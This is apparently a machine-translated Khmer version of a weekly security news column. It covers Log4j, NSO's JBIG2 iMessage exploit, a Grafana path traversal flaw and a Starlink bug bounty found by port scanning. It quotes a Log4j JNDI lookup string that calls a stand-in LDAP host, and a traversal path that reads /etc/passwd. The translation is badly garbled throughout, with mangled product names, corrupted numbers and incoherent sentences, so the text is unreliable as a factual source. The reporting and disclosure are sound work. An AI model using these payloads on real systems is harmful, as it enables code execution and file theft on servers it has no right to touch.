ដំណឹងធំប្តាហ៍នេះគឺ Log4j បំបែកតែប៉ុន្មានម៉ោងផងដែររួមបញ្ចូលទាំងចុងដើម្បីត្រូវបាននៅក្នុងជួរឈរសប្តាហ៍មុន។ មនុស្សដែលត្រូវបានស្នើសុំរួចហើយប្រសិនបើនេះជាភាពងាយរងគ្រោះធ្ងន់ធ្ងរបំផុតដែលមិនធ្លាប់មាន, ដូចដែលវាធ្វើមើលទៅដូចជាវាជាការយ៉ាងហោចណាស់ក្នុងការរត់នេះ។ កំហុសត្រូវបានរកឃើញជាលើកដំបូងដោយអ្នកជំនាញយ៉ាងខ្លាំងនៅក្នុងក្រុមហ៊ុន Alibaba សន្ដិសុខដែលបានជូនដំណឹងពីកំហុសកម្មវិធី Apache ថ្ងៃទី 24 ខែវិច្ឆិកា។ Cloudflare បានដកទិន្នន័យរបស់ពួកគេព្រមទាំងបានរកឃើញភស្តុតាងនៃភាពងាយរងគ្រោះជាអ្នកដែលនៅក្នុងព្រៃជាដំបូងនៅថ្ងៃទី 1 ខែធ្នូ។ ឧទាហរណ៍ដើមទាំងនេះត្រូវបានកំណត់គោលដៅយ៉ាងខ្លាំងរង្វើលព្រមទាំងខ្លាំងណាស់, គ្រប់គ្រាន់ដើម្បីធ្វើឱ្យខ្ញុំឆ្ងល់ថាតើនេះមិនមែនជាអ្នកស្រាវជ្រាវដែលជាផ្នែកមួយនៃការរកឃើញបឋមដែលបានធ្វើការសិក្សាស្រាវជ្រាវបន្ថែមទៀតលើបញ្ហានេះ។ ដោយមិនគិតនៅលើទី 9 ខែធ្នូដែលជាបុគ្គលរបស់ Twitter បានសរសេរសេចក្តីលម្អិតនៃភាពងាយរងគ្រោះនេះផងដែរជាឋាននរកសន្តិសុខបានបំបែករលុង។ ប្រាំបួននាទីបន្ទាប់ពីការ Tweet នេះបានព្យាយាមទាញយកបានឃើញ Cloudflare ជាថ្មីម្តងទៀតព្រមទាំងក្នុងរយៈពេលប្រាំបីម៉ោងដែលពួកគេត្រូវបានការដោះស្រាយជាមួយនឹងការព្យាយាម 20,000 កេងប្រវ័ញ្ចក្នុងមួយនាទី។
នោះហើយជាការកំណត់ពេលវេលា, ទោះជាយ៉ាងណាអ្វីដែលកើតឡើងជាមួយនឹងការកេងប្រវ័ញ្ចព្រមទាំងហេតុអ្វីបានជាវាជាការអាក្រក់ដូច្នេះ? ជាដំបូង, បាច់ដែលងាយរងគ្រោះមាន Log4j បណ្ណាល័យកាប់ឈើសម្រាប់ជ្វា។ វាអនុញ្ញាតឱ្យដំណើរការដើម្បីទទួលបានសារកំណត់ហេតុដែលពួកគេបានតម្រូវដើម្បីជាកន្លែងដែលទៅ, ទោះជាយ៉ាងណាជាមួយនឹងជាច្រើននៃកណ្តឹងផងដែរកញ្ចែបានរួមបញ្ចូល។ មួយនៃលក្ខណៈពិសេសទាំងនោះគឺការគាំទ្រសម្រាប់ JNDI, បញ្ហាសន្តិសុខមួយបានយល់នៅក្នុងកោះជ្វា។ សំណើ JNDI អាចនាំឱ្យមានការវាយប្រហារ deserialization មួយដែលជាកន្លែងដែលស្ទ្រីមទិន្នន័យចូលមកត្រូវ malformed អាក្រក់, ប្រព្រឹត្តខុសពេលវាត្រូវបានពង្រីកត្រឡប់ចូលទៅក្នុងវត្ថុមួយ។ វាមិនត្រូវបានន័យសម្រាប់ការរកមើល JNDI អ្នកដែលនឹងត្រូវបានអនុវត្តនៅទូទាំងអ៊ិនធឺណិ, ទោះជាយ៉ាងណាមិនមានជាក់លាក់មួយដែលពិនិត្យសម្រាប់ឥរិយាបថនេះដូច្នេះខាងស្ដាំនៅទីនេះយើងមាន។
គំនិតចុងក្រោយគឺថាប្រសិនបើអ្នកអាចបង្កតែងកំណត់ហេតុជាមួយ log4j ដែលរួមមាន $ {jndi: ldap: //example.com/a} អ្នកអាចរត់កូដនៅលើម៉ាស៊ីនដែលបានបំពាន។ អ្នកស្រាវជ្រាវបានព្រមទាំងឧក្រិដ្ឋជនបានមកឡើងរួចទៅហើយជាមួយដើម្បីដោះស្រាយវិធីសាស្រ្តច្នៃប្រឌិតថ្មីដែលមានដូចជាខ្សែអក្សរដែលរួមមានទាំងកម្មវិធីរុករកភ្នាក់ងារមួយឬឈ្មោះដំបូងខ្លាំងណាស់។ បាទ, វាជាការត្រឡប់មកវិញរបស់លោក Bobby Tables.Log4j 2.16.0 បន្តិចនោះ។ 2.15.0 មានផ្ទុកជួសជុលផ្នែក, ទោះជាយ៉ាងណាមិនបានទាំងស្រុងកម្ចាត់បញ្ហានេះ។ កោះជ្វាធ្វើឱ្យទាន់សម័យបានជាមួយការផ្លាស់ប្តូរការកំណត់លំនាំដើមដូច្នោះ, ការផ្តល់ការបន្ធូរបន្ថយផ្នែក។ ទោះជាយ៉ាងណាយើងភាគច្រើនទំនងជាមិនបានឃើញចុងបញ្ចប់នៃរឿងនេះនៅឡើយទេ។
NSO ព្រមទាំងស៊ីភីយូកម្មវិធីត្រាប់តាមជា PDF មួយ
បានវាត្រូវបាននរណាម្នាក់ផ្សេងទៀតជាងការងាររបស់ Google សូន្យប្រាប់រឿងនេះខ្ញុំនឹងបានផ្លុំវាចេញជាឧបករណ៍ផែនហូលីវូដក្រីក្រ។ ភាពងាយរងគ្រោះនេះគឺនៅក្នុងកម្មវិធី iOS iMessage ព្រមទាំងច្បាស់អំពីរបៀបដែលវាគ្រប់គ្រង .gif ទិន្នន័យដែលពិតជាមានទិន្នន័យជា PDF ។ ឬជាឯកសារ PDF មានភាពបត់បែនដើម្បីដាក់វាកើតឡើង។ រចនាប័ទ្មការអ៊ិនកូដអាចធ្វើបានគឺ JBIG2, ខ្មៅព្រមទាំងកូឌិកសពីឆ្នាំ 2000 ការបង្ហាប់ដែលជាផ្នែកមួយនៃកូដិកនេះគឺមានសមត្ថភាពក្នុងការប្រើប្រាស់ប្រតិបត្តិករប៊ូលីននិងឬ XOR ព្រមទាំង XNOR ដើម្បីតំណាងឱ្យភាពខុសគ្នាបន្តិចបន្តួចរវាងប្លុកដែលបានបង្ហាប់ផងដែរ។ លើសចំណុះចំនួនគត់ក្នុងកូដពន្លានេះអនុញ្ញាតឱ្យការចងចាំច្រើនបន្ថែមទៀតដើម្បីត្រូវបានគិតអំពីទិន្នផលត្រឹមត្រូវសម្រាប់ការបង្ហាប់ដែលមានន័យថាកូដបង្ហាប់អាចរត់ប្រតិបត្តិករទាំងនោះនៅលើអង្គចងចាំ BOOLEAN បន្ថែមទៀតនោះ។
ឥឡូវនេះអ្វីដែលអ្នកមិនទទួលបាននៅពេលដែលអ្នកមានច្រើននៃការចងចាំព្រមទាំងប្រតិបត្តិករទាំងបួន? ការ Turing ស៊ីភីយូសរុបការពិតណាស់។ បាទ, អ្នកស្រាវជ្រាវនៅក្រុម NSO ពិតជាបានបង្កើតស៊ីភីយូអនឡាញមួយនៅក្នុងឯកសារ PDF ឌិកូដទម្លាប់ព្រមទាំងប្រើប្រាស់វេទិកានោះដើម្បីចាប់ផ្ដើមរត់គេចខ្លួនប្រអប់ខ្សាច់របស់ពួកគេ។ វាជារឿងឆ្កួត, មិនគួរឱ្យជឿព្រមទាំងអស្ចារ្យ។ [លោក Ed ចំណាំ: ជាការល្អក្រុមជនក្រីក្រគឺជាការសំខាន់អាក្រក់ NSO ។ ]
Grafana ផ្លូវការឆ្លុះ
វេទិកាដែលមើលឃើញបច្ចុប្បន្ននេះគ្រាន់តែគ្រាន់តែ Grafana ជួសជុលបញ្ហាធ្ងន់ធ្ងររបស់ CVE-2021-43798 ។ ភាពងាយរងគ្រោះនេះអនុញ្ញាតសម្រាប់ថតតាមរយៈផ្លូវឆ្លងកាត់កម្មវិធីជំនួយនេះ។ ដូច្នេះឧទាហរណ៍ /public/plugins/alertlist/../../../../../../../../etc/passwd នឹងត្រឡប់ទិន្នន័យ passwd ពីម៉ាស៊ីនបម្រើលីនុច។ ធ្វើឱ្យទាន់សម័យនេះបានជួសជុលបញ្ហានេះត្រូវបានគេចេញផ្សាយនៅថ្ងៃទី 7 ខែធ្នូ។ កំហុសនេះគឺពិតជា 0 ថ្ងៃសម្រាប់ពីរបីថ្ងៃ, ដូចដែលវាត្រូវបានគេកំពុងត្រូវបានពិភាក្សានៅថ្ងៃទី 3 ជាសាធារណៈ, ទោះជាយ៉ាងណាមិនស្គាល់ទៅ devs Grafana ។ ពិនិត្យចេញ postmortem របស់ពួកគេសម្រាប់សេចក្ដីលម្អិត។
Starlink
ហើយទីបំផុតខ្ញុំមានការសិក្សាស្រាវជ្រាវមួយចំនួនដើម្បីគ្របដណ្តប់ដើម។ អ្នកអាចនឹងស៊ាំជាមួយការងាររបស់ខ្ញុំគ្របដណ្តប់បណ្តាញប្រព័ន្ធផ្កាយរណប Starlink ។ ជាផ្នែកមួយនៃកម្លាំងរុញច្រានសម្រាប់ការទិញព្រមទាំងរក្សា Starlink នេះគឺដើម្បីធ្វើការសិក្សាស្រាវជ្រាវសន្ដិសុខនៅលើវេទិកានេះផងដែរជាគោលដៅដែលបានកើតចុងក្រោយផ្លែឈើមួយចំនួន – ដើម្បីបទភ្លេងនៃប្រាក់រង្វាន់ 4,800 $ នោះ។ ខាងក្រោមនេះគឺជារឿងនេះ។
ខ្ញុំមានជិតស្និទ្ធដោយមិត្តភក្ដិដែលបានប្រើប្រាស់ Starlink ដូច្នោះដែរដូចជានៅថ្ងៃទី 7 ខែធ្នូនេះយើងរកឃើញថាយើងបានទាំងពីរត្រូវបានផ្តល់ជាអាសយដ្ឋាន IPv4 routable សាធារណៈ។ ច្បាស់អំពីរបៀបធ្វើការងាររបស់រវាងផ្លូវ Starlink អតិថិជន? ចរាចរបណ្ដាញតើបានបញ្ជូនពីបណ្តាញរបស់ខ្ញុំទៅរបស់គាត់ត្រូវបានដឹកនាំដោយផ្ទាល់នៅលើផ្កាយរណបឬនឹងកញ្ចប់គ្នាមានដើម្បី bounce បិទផ្កាយរណបដោយមានស្ថានីយ៍ដី SpaceX របស់លោកត្រឡប់ទៅបក្សីព្រមទាំងបន្ទាប់មកចុងក្រោយទៅខ្ញុំ? traceroute គឺជាឧបករណ៍អស្ចារ្យផងដែរវាជាការឆ្លើយតបទៅនឹងសំណួរនេះ:
traceroute ដើម្បី 98.97.92.x (98.97.92.x), 30 hops max, 46 បៃ
Home.dllstxxx.pop.starlinkisp.net (98.970.1) 25.830 លោកស្រី 24.020 លោកស្រី 23.082 MS 23.082 MS
2 172.16.248.6 (172.16.248.6) 27.783 លោកស្រី 23.973 លោកស្រី 27.363 MS
3 172.16.248.21 (172.16.248.21) 23.728 MS 26.880 MS 28.299 MS
4 undefins.hostname.Hocalhost (98.97.92.x) 59.220 MS 51.474 MS 51.877 MS
យើងមិនយល់ច្បាស់ពីអ្វីដែលបណ្តាញនីមួយៗមានចំនួននៃការឡើងភ្នំក៏ដូចជារយៈពេលដ៏យូរអង្វែងចំពោះរាល់ការធ្វើឱ្យចរាចរណ៍គេហទំព័ររបស់យើងនឹងមានស្ថានីយ៍ដី។ ទោះយ៉ាងណាក៏ដោយមានអ្វីប្លែកអំពីអ្នកត្រានេះ។ តើអ្នកបានគ្រប់គ្រងវាទេ? យោងតាម RFC1918 នេះគឺជាបណ្តាញផ្ទាល់ខ្លួន។ ការពិតដែលវាបង្ហាញនៅក្នុង Tracerout មានន័យថារ៉ោតទ័រ Openwort របស់ខ្ញុំក៏ដូចជាឧបករណ៍ Starlink ក៏មានប្រសិទ្ធិភាពពីផ្ទៃតុរបស់ខ្ញុំដល់អាសយដ្ឋាននោះដែរ។ ឥឡូវនេះខ្ញុំបានរកឃើញរឿងប្រភេទនេះពីមុននៅលើបណ្តាញរបស់ ISP ផ្សេងគ្នា។ ការយល់ដឹងថានេះអាចគួរឱ្យចាប់អារម្មណ៍ខ្ញុំបានណែនាំ NMAS ក៏ដូចជាបានស្កេនអាយភីផ្ទាល់ខ្លួនដែលបានបង្ហាញនៅក្នុង Traceroute ។ ប៊ីងហ្គោ។
172.16.248.6 ត្រូវបានចាក់សោរយ៉ាងត្រឹមត្រូវទោះយ៉ាងណា 172.16.248.21 បានបង្ហាញកំពង់ផែបើកចំហ។ គឺ, កំពង់ផែ 179, 9100, 9101, ក៏ដូចជា 50051. Nmap ជឿជាក់ថា 179 គឺ BGP ដែលស្តាប់ទៅត្រឹមត្រូវ។ ទោះយ៉ាងណានៅសល់របស់ពួកគេ? Telnet ។ ខ្ញុំមានភាពវិជ្ជមានដែលមិនមានសេវាកម្មរបស់ក្រុមហ៊ុន Telnet ពិតជាការចាប់ផ្តើមដ៏អស្ចារ្យនៅពេលដែលព្យាយាមកំណត់សេវាកម្មដែលមិនស្គាល់។ នេះមិនមែនជាករណីលើកលែងនោះទេ។ កំពង់ផែ 9100 ក៏ដូចជា 9101 បានប្រាប់ខ្ញុំថាខ្ញុំបានធ្វើការស្នើសុំមិនល្អដោយបោះកំហុស 40000 ។ ពួកគេគឺជាសេវាកម្ម HTTP! ទាញទាំងពីរនៅក្នុងកម្មវិធីរុករកគេហទំព័រផ្តល់ឱ្យខ្ញុំនូវលទ្ធផលបំបាត់កំហុសដែលបានលេចឡើងពីម៉ាស៊ីនមេ Fython Flask ។
កំពង់ផែចុងក្រោយដែល 50051 គួរឱ្យចាប់អារម្មណ៍។ សេវាកម្មតែមួយគត់ដែលខ្ញុំអាចរកឃើញថាជាធម្មតាត្រូវបានដំណើរការមាន GRPC របស់ Google ដែលជាពិធីសារហៅទូរស័ព្ទពីចម្ងាយ។ Grpc_cli បានចូលប្រើដើម្បីផ្ទៀងផ្ទាត់ថាគឺជាអ្វីដែលខ្ញុំបានរកឃើញ។ ការឆ្លុះបញ្ចាំងជាអកុសលត្រូវបានបិទ, មានន័យថាសេវាកម្មបានបដិសេធក្នុងការសំដៅទៅលើពាក្យបញ្ជាដែលវាបានគាំទ្រ។ ការគូសផែនទីពាក្យបញ្ជាប្រភេទណាមួយដែលត្រូវការការបោះចោលទិន្នន័យជាច្រើននៅកំពង់ផែនោះ។
ត្រង់ចំណុចនេះខ្ញុំចាប់ផ្តើមចោទសួរច្បាស់អំពីអ្វីដែលផ្នែករឹងដែលខ្ញុំកំពុងនិយាយ។ វាបានធ្វើ BGP វាជាមហាផ្ទៃទៅបណ្តាញរបស់ Starlink ក៏ដូចជាចរាចរណ៍គេហទំព័ររបស់ខ្ញុំកំពុងធ្វើដំណើរជាមួយវា។ តើនេះជាផ្កាយរណបទេ? ភាគច្រើនទំនងជាមិន, ទោះជាយ៉ាងណាក៏ដោយអំណោយទានដ៏អស្ចារ្យរបស់ផ្កាយគឺត្រូវដកចេញពីអ្វីដែលគួរតែមកបន្ទាប់។ នៅក្រោមកាលៈទេសៈណាក៏ដោយអ្នកស្រាវជ្រាវមិនគួរធ្វើតេស្តិ៍តាមអ៊ិនធរណេតលើផ្កាយរណបឬហេដ្ឋារចនាសម្ព័ន្ធសំខាន់ៗផ្សេងទៀតទេ។ ខ្ញុំសង្ស័យថាខ្ញុំបាននិយាយទៅកាន់ផ្នែកមួយនៃហេដ្ឋារចនាសម្ព័ន្ធដែលភាគច្រើនទំនងជានៅស្ថានីយ៍ដីនៅទីក្រុងដាឡាស។ ទោះជាយ៉ាងណាក៏ដោយការលេងសើចក៏ដូចជាការបែកបាក់អ្វីមួយត្រូវបានគេអាក់អន់ចិត្តដូច្នេះខ្ញុំបានបង្កើតឡើងនូវការលាតត្រដាងលើអ្វីដែលខ្ញុំបានរកឃើញ។
វិស្វករ Starlick មានកំពង់ផែបានបិទក្នុងរយៈពេលដប់ពីរម៉ោងនៃរបាយការណ៍ក៏ដូចជាបានសួរខ្ញុំឱ្យពិនិត្យមើលទ្រីភាពរបស់ពួកគេទ្វេដង។ ប្រាកដណាស់, ខណៈពេលដែលខ្ញុំនៅតែអាច ping ips ផ្ទាល់ខ្លួន, គ្មានកំពង់ផែត្រូវបានបើកចំហ។ នៅទីនេះគឺជាកន្លែងដែលខ្ញុំត្រូវតែមានប្រវត្តិឥណទានបុរសដែលដំណើរការអំណោយទានដ៏អស្ចារ្យរបស់ SpaceX ។ ពួកគេប្រហែលជាបានហៅនេះថាការលាតត្រដាងព័ត៌មានសាមញ្ញមួយបានបង់ពីរបីរយដុល្លារក៏ដូចជាហៅវាក្នុងមួយថ្ងៃ។ ផ្ទុយទៅវិញពួកគេបានចំណាយពេលធ្វើការស៊ើបអង្កេតក៏ដូចជាបានបញ្ជាក់ថាខ្ញុំពិតជាបានរកឃើញកំពង់ផែ GRPC បើកចំហក៏ដូចជាទម្លាក់គ្រាប់បែកដែលជាការបញ្ចប់ដោយគ្មានការអនុញ្ញាត។ ការរកឃើញនេះបានផ្តល់រង្វាន់បឋមចំនួន 3,800 ដុល្លារបូករួមនឹងរង្វាន់រង្វាន់ចំនួន 1.000 ដុល្លារសម្រាប់របាយការណ៍ដ៏ទូលំទូលាយក៏ដូចជាមិនធ្វើឱ្យខូចប្រព័ន្ធអ៊ីនធឺណេតរបស់ពួកគេ។ ក្នុងនាមជាមិត្តភក្ដិក្នុងតំបន់របស់ខ្ញុំពាក់កណ្តាលលេងបានយ៉ាងសាមញ្ញនោះគឺជាប្រាក់ដ៏ច្រើនសម្រាប់ការរត់ NMAP ។
ត្រូវហើយមានសំណាងមួយដែលពាក់ព័ន្ធនឹងការរួមបញ្ចូលគ្នាជាមួយនឹងបទពិសោធន៍ដ៏អស្ចារ្យមួយដែលមានបទពិសោធជាមុនដែលមានបណ្តាញ។ ការដើរបឋមសិក្សាគួរតែជាការសិក្សាស្រាវជ្រាវសុវត្ថិភាពមិនតែងតែជាការប្រឈមនឹងភាពងាយរងគ្រោះរបស់ខ្លួនក៏ដូចជាការអភិវឌ្ឍកេងប្រវ័ញ្ច។ អ្នកមិនចាំបាច់អភិវឌ្ឍប្រព័ន្ធពេញលេញនៃការធ្វើត្រាប់តាមជា PDF ទេ។ ពេលខ្លះវាគ្រាន់តែជាអាយភីក៏ដូចជាការស្កេនកំពង់ផែដែលរួមបញ្ចូលជាមួយនឹងការតស៊ូក៏ដូចជាសំណាងបន្តិចបន្តួច។ តាមពិតប្រសិនបើ ISP របស់អ្នកមានកម្មវិធីអំណោយបន្ថែមកំហុសអ្នកអាចព្យាយាមដោតម៉ាស៊ីនលីនុចដោយផ្ទាល់ទៅក្នុងម៉ូឌឹមក៏ដូចជាការស្កេនជួរ IP ផ្ទាល់ខ្លួន។ រក្សាភ្នែករបស់អ្នកឱ្យបើក។ អ្នកផងដែរគ្រាន់តែអាចរកឃើញអ្វីដែលគួរឱ្យចាប់អារម្មណ៍។